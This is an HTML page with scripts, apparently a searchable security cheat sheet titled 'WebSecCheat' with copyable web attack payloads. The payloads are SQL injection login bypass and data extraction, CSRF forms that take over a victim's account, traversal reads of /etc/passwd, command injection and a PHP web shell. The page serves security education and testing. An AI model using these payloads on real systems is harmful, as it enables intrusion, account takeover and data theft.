<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Web Security Cheat Sheet - Vulnerability Search</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        .vulnerability-card {
            transition: all 0.3s ease;
        }
        .vulnerability-card:hover {
            transform: translateY(-5px);
            box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
        }
        .search-highlight {
            background-color: #fef08a;
            padding: 0 2px;
            border-radius: 2px;
        }
        .type-badge {
            padding: 2px 8px;
            border-radius: 12px;
            font-size: 12px;
            font-weight: 600;
        }
        .copy-btn {
            opacity: 0;
            transition: opacity 0.2s ease;
        }
        .vulnerability-card:hover .copy-btn {
            opacity: 1;
        }
    </style>
</head>
<body class="bg-gray-50 min-h-screen">
    <header class="bg-gradient-to-r from-purple-800 to-indigo-900 text-white shadow-lg">
        <div class="container mx-auto px-4 py-6">
            <div class="flex flex-col md:flex-row justify-between items-center">
                <div class="flex items-center mb-4 md:mb-0">
                    <i class="fas fa-shield-alt text-3xl mr-3"></i>
                    <h1 class="text-2xl md:text-3xl font-bold">WebSec<span class="text-yellow-300">Cheat</span></h1>
                </div>
                <nav class="flex space-x-1 md:space-x-4" id="mainNav">
                    <a href="#" class="nav-btn px-3 py-2 rounded-md font-medium" data-filter="xss">XSS</a>
                    <a href="#" class="nav-btn px-3 py-2 rounded-md font-medium" data-filter="sqli">SQLi</a>
                    <a href="#" class="nav-btn px-3 py-2 rounded-md font-medium" data-filter="csrf">CSRF</a>
                    <a href="#" class="nav-btn px-3 py-2 rounded-md font-medium" data-filter="all">More</a>
                </nav>
            </div>
        </div>
    </header>

    <main class="container mx-auto px-4 py-8">
        <section class="mb-12">
            <div class="max-w-3xl mx-auto text-center mb-8">
                <h2 class="text-3xl md:text-4xl font-bold text-gray-800 mb-4">Web Vulnerability Search Engine</h2>
                <p class="text-gray-600 text-lg">Find payloads, commands, and techniques for security testing and ethical hacking</p>
            </div>

            <div class="max-w-2xl mx-auto relative">
                <div class="relative">
                    <input type="text" id="searchInput" placeholder="Search for XSS payloads, SQL injection commands, etc..." 
                           class="w-full px-6 py-4 rounded-full border-0 shadow-lg focus:ring-2 focus:ring-purple-500 focus:outline-none text-gray-700">
                    <button id="searchBtn" class="absolute right-2 top-2 bg-purple-600 text-white px-6 py-2 rounded-full hover:bg-purple-700 transition">
                        <i class="fas fa-search"></i> Search
                    </button>
                </div>
                <div class="mt-3 flex flex-wrap justify-center gap-2">
                    <span class="text-xs text-gray-500">Quick searches:</span>
                    <button class="quick-search text-xs bg-gray-200 hover:bg-gray-300 px-3 py-1 rounded-full" data-term="xss">XSS</button>
                    <button class="quick-search text-xs bg-gray-200 hover:bg-gray-300 px-3 py-1 rounded-full" data-term="sql injection">SQLi</button>
                    <button class="quick-search text-xs bg-gray-200 hover:bg-gray-300 px-3 py-1 rounded-full" data-term="csrf">CSRF</button>
                    <button class="quick-search text-xs bg-gray-200 hover:bg-gray-300 px-3 py-1 rounded-full" data-term="lfi">LFI</button>
                    <button class="quick-search text-xs bg-gray-200 hover:bg-gray-300 px-3 py-1 rounded-full" data-term="rce">RCE</button>
                </div>
            </div>
        </section>

        <section class="mb-12">
            <div class="flex justify-between items-center mb-6">
                <h3 class="text-xl font-semibold text-gray-800">Popular Vulnerabilities</h3>
                <div class="flex space-x-2">
                    <button class="filter-btn active px-3 py-1 bg-purple-600 text-white rounded-md text-sm" data-filter="all">All</button>
                    <button class="filter-btn px-3 py-1 bg-gray-200 hover:bg-gray-300 rounded-md text-sm" data-filter="xss">XSS</button>
                    <button class="filter-btn px-3 py-1 bg-gray-200 hover:bg-gray-300 rounded-md text-sm" data-filter="sqli">SQLi</button>
                    <button class="filter-btn px-3 py-1 bg-gray-200 hover:bg-gray-300 rounded-md text-sm" data-filter="csrf">CSRF</button>
                </div>
            </div>

            <div id="vulnerabilityGrid" class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-6">
                <!-- Vulnerabilities will be loaded here -->
            </div>
        </section>

        <section class="bg-white rounded-xl shadow-md p-6 mb-12">
            <h3 class="text-xl font-semibold text-gray-800 mb-4">About This Resource</h3>
            <div class="prose max-w-none">
                <p class="text-gray-600 mb-4">
                    This is an educational resource for security professionals, developers, and ethical hackers to learn about web application vulnerabilities. 
                    All information provided is for educational and defensive security purposes only.
                </p>
                <div class="bg-yellow-50 border-l-4 border-yellow-400 p-4">
                    <div class="flex">
                        <div class="flex-shrink-0">
                            <i class="fas fa-exclamation-triangle text-yellow-400"></i>
                        </div>
                        <div class="ml-3">
                            <p class="text-sm text-yellow-700">
                                <strong>Legal Notice:</strong> Unauthorized testing of systems you don't own is illegal. Always get proper authorization before performing any security testing.
                            </p>
                        </div>
                    </div>
                </div>
            </div>
        </section>
    </main>

    <footer class="bg-gray-800 text-white py-8">
        <div class="container mx-auto px-4">
            <div class="flex flex-col md:flex-row justify-between items-center">
                <div class="mb-4 md:mb-0">
                    <h2 class="text-xl font-bold">WebSec<span class="text-yellow-300">Cheat</span></h2>
                    <p class="text-gray-400 text-sm">Security resources for ethical hackers</p>
                </div>
                <div class="flex space-x-4">
                    <a href="#" class="text-gray-400 hover:text-white"><i class="fab fa-github"></i></a>
                    <a href="#" class="text-gray-400 hover:text-white"><i class="fab fa-twitter"></i></a>
                    <a href="#" class="text-gray-400 hover:text-white"><i class="fas fa-book"></i></a>
                </div>
            </div>
            <div class="mt-6 pt-6 border-t border-gray-700 text-center text-gray-400 text-sm">
                <p>© 2023 WebSecCheat. All information provided for educational purposes only.</p>
            </div>
        </div>
    </footer>

    <script>
        // Sample vulnerability data
        const vulnerabilities = [
            {
                id: 1,
                title: "SQL Injection - Basic",
                description: "Basic SQL injection to bypass authentication.",
                code: "' OR '1'='1' --",
                type: "sqli",
                risk: "high",
                tags: ["sql", "injection", "authentication"]
            },
            {
                id: 2,
                title: "CSRF Proof of Concept",
                description: "Basic CSRF form that submits automatically.",
                code: "<form action=\"https://vulnerable.com/change-email\" method=\"POST\">\n  <input type=\"hidden\" name=\"email\" value=\"attacker@evil.com\">\n</form>\n<script>document.forms[0].submit();</script>",
                type: "csrf",
                risk: "high",
                tags: ["csrf", "form", "javascript"]
            },
            {
                id: 3,
                title: "SQL Injection - Union Based",
                description: "Union-based SQL injection to extract data.",
                code: "' UNION SELECT username, password FROM users--",
                type: "sqli",
                risk: "critical",
                tags: ["sql", "injection", "union"]
            },
            {
                id: 4,
                title: "Blind SQL Injection",
                description: "Time-based blind SQL injection payload.",
                code: "' OR IF(1=1,SLEEP(5),0)--",
                type: "sqli",
                risk: "high",
                tags: ["sql", "injection", "blind"]
            },
            {
                id: 5,
                title: "CSRF with JSON",
                description: "CSRF attack sending JSON data.",
                code: "<script>\n  fetch('https://vulnerable.com/api/change-password', {\n    method: 'POST',\n    body: JSON.stringify({newPassword: 'hacked'}),\n    headers: {'Content-Type': 'application/json'}\n  });\n</script>",
                type: "csrf",
                risk: "high",
                tags: ["csrf", "javascript", "fetch"]
            },
            {
                id: 6,
                title: "LFI Basic",
                description: "Local File Inclusion using directory traversal.",
                code: "../../../../etc/passwd",
                type: "lfi",
                risk: "high",
                tags: ["lfi", "file inclusion", "traversal"]
            },
            {
                id: 7,
                title: "LFI with Null Byte",
                description: "LFI using null byte to bypass file extension checks.",
                code: "../../../../etc/passwd%00.php",
                type: "lfi",
                risk: "medium",
                tags: ["lfi", "null byte", "bypass"]
            },
            {
                id: 8,
                title: "Remote Code Execution (RCE) via eval()",
                description: "RCE exploiting eval() with user input.",
                code: "?cmd=ls; cat /etc/passwd",
                type: "rce",
                risk: "critical",
                tags: ["rce", "eval", "command injection"]
            },
            {
                id: 9,
                title: "RCE via File Upload",
                description: "Upload a web shell and execute commands.",
                code: "<?php system($_GET['cmd']); ?>",
                type: "rce",
                risk: "critical",
                tags: ["rce", "file upload", "web shell"]
            }
        ];

        // DOM elements
        const searchInput = document.getElementById('searchInput');
        const searchBtn = document.getElementById('searchBtn');
        const vulnerabilityGrid = document.getElementById('vulnerabilityGrid');
        const filterBtns = document.querySelectorAll('.filter-btn');
        const quickSearchBtns = document.querySelectorAll('.quick-search');

        // Current filter
        let currentFilter = 'all';
        let currentSearchTerm = '';

        // Initialize the page
        document.addEventListener('DOMContentLoaded', () => {
            renderVulnerabilities(vulnerabilities);

            // Add event listeners
            searchBtn.addEventListener('click', handleSearch);
            searchInput.addEventListener('keypress', (e) => {
                if (e.key === 'Enter') handleSearch();
            });

            filterBtns.forEach(btn => {
                btn.addEventListener('click', () => {
                    filterBtns.forEach(b => b.classList.remove('active', 'bg-purple-600', 'text-white'));
                    btn.classList.add('active', 'bg-purple-600', 'text-white');
                    currentFilter = btn.dataset.filter;
                    filterAndRender();
                });
            });

            // Main nav event listeners (top navigation)
            document.querySelectorAll('.nav-btn').forEach(btn => {
                btn.addEventListener('click', (e) => {
                    e.preventDefault();
                    document.querySelectorAll('.nav-btn').forEach(b => b.classList.remove('bg-white', 'bg-opacity-10', 'font-bold'));
                    btn.classList.add('bg-white', 'bg-opacity-10', 'font-bold');
                    currentFilter = btn.dataset.filter;
                    filterBtns.forEach(b => b.classList.remove('active', 'bg-purple-600', 'text-white'));
                    // Highlight corresponding filter button below if exists
                    const filterBtn = Array.from(filterBtns).find(b => b.dataset.filter === currentFilter);
                    if (filterBtn) {
                        filterBtn.classList.add('active', 'bg-purple-600', 'text-white');
                    }
                    filterAndRender();
                });
            });

            quickSearchBtns.forEach(btn => {
                btn.addEventListener('click', () => {
                    searchInput.value = btn.dataset.term;
                    handleSearch();
                });
            });
        });

        // Handle search
        function handleSearch() {
            currentSearchTerm = searchInput.value.trim().toLowerCase();
            filterAndRender();
        }

        // Filter and render vulnerabilities
        function filterAndRender() {
            let filtered = vulnerabilities;
            
            // Apply type filter
            if (currentFilter !== 'all') {
                filtered = filtered.filter(vuln => vuln.type === currentFilter);
            }
            
            // Apply search term
            if (currentSearchTerm) {
                filtered = filtered.filter(vuln => 
                    vuln.title.toLowerCase().includes(currentSearchTerm) ||
                    vuln.description.toLowerCase().includes(currentSearchTerm) ||
                    vuln.code.toLowerCase().includes(currentSearchTerm) ||
                    vuln.tags.some(tag => tag.includes(currentSearchTerm))
                );
            }
            
            renderVulnerabilities(filtered);
        }

        // Render vulnerabilities to the grid
        function renderVulnerabilities(vulns) {
            vulnerabilityGrid.innerHTML = '';
            
            if (vulns.length === 0) {
                vulnerabilityGrid.innerHTML = `
                    <div class="col-span-full text-center py-12">
                        <i class="fas fa-search text-4xl text-gray-300 mb-4"></i>
                        <h4 class="text-xl font-medium text-gray-500">No vulnerabilities found</h4>
                        <p class="text-gray-400">Try a different search term or filter</p>
                    </div>
                `;
                return;
            }
            
            vulns.forEach(vuln => {
                const card = document.createElement('div');
                card.className = 'vulnerability-card bg-white rounded-xl shadow-md overflow-hidden hover:shadow-xl';
                
                // Highlight search term in title and description
                let highlightedTitle = vuln.title;
                let highlightedDesc = vuln.description;
                
                if (currentSearchTerm) {
                    const regex = new RegExp(currentSearchTerm, 'gi');
                    highlightedTitle = vuln.title.replace(regex, match => `<span class="search-highlight">${match}</span>`);
                    highlightedDesc = vuln.description.replace(regex, match => `<span class="search-highlight">${match}</span>`);
                }
                
                // Risk level color
                let riskColor = 'bg-green-500';
                if (vuln.risk === 'medium') riskColor = 'bg-yellow-500';
                if (vuln.risk === 'high') riskColor = 'bg-orange-500';
                if (vuln.risk === 'critical') riskColor = 'bg-red-500';
                
                card.innerHTML = `
                    <div class="p-6">
                        <div class="flex justify-between items-start mb-2">
                            <h4 class="text-lg font-semibold text-gray-800">${highlightedTitle}</h4>
                            <span class="type-badge ${getTypeColor(vuln.type)} text-white text-xs">${vuln.type.toUpperCase()}</span>
                        </div>
                        <p class="text-gray-600 text-sm mb-4">${highlightedDesc}</p>
                        
                        <div class="relative bg-gray-800 rounded-lg p-4 mb-4">
                            <pre class="text-gray-300 text-sm overflow-x-auto"><code>${escapeHtml(vuln.code)}</code></pre>
                            <button class="copy-btn absolute top-2 right-2 bg-gray-700 text-white p-1 rounded-md hover:bg-gray-600" data-clipboard-text="${escapeHtml(vuln.code)}">
                                <i class="fas fa-copy text-xs"></i>
                            </button>
                        </div>
                        
                        <div class="flex justify-between items-center">
                            <div class="flex items-center">
                                <span class="text-xs font-medium mr-2">Risk:</span>
                                <span class="h-2 w-2 rounded-full ${riskColor} mr-1"></span>
                                <span class="text-xs text-gray-600 capitalize">${vuln.risk}</span>
                            </div>
                            <div class="flex space-x-2">
                                ${vuln.tags.map(tag => `<span class="text-xs bg-gray-100 text-gray-600 px-2 py-1 rounded-full">${tag}</span>`).join('')}
                            </div>
                        </div>
                    </div>
                `;
                
                vulnerabilityGrid.appendChild(card);
            });
            
            // Add copy functionality to all copy buttons
            document.querySelectorAll('.copy-btn').forEach(btn => {
                btn.addEventListener('click', (e) => {
                    const text = btn.dataset.clipboardText;
                    navigator.clipboard.writeText(text).then(() => {
                        const originalIcon = btn.innerHTML;
                        btn.innerHTML = '<i class="fas fa-check text-xs"></i>';
                        setTimeout(() => {
                            btn.innerHTML = originalIcon;
                        }, 2000);
                    });
                });
            });
        }
        
        // Helper function to get color based on vulnerability type
        function getTypeColor(type) {
            const colors = {
                xss: 'bg-red-500',
                sqli: 'bg-blue-500',
                csrf: 'bg-purple-500',
                lfi: 'bg-green-500',
                rce: 'bg-orange-500'
            };
            return colors[type] || 'bg-gray-500';
        }
        
        // Helper function to escape HTML
        function escapeHtml(unsafe) {
            return unsafe
                .replace(/&/g, "&amp;")
                .replace(/</g, "&lt;")
                .replace(/>/g, "&gt;")
                .replace(/"/g, "&quot;")
                .replace(/'/g, "&#039;");
        }
    </script>
</body>
</html>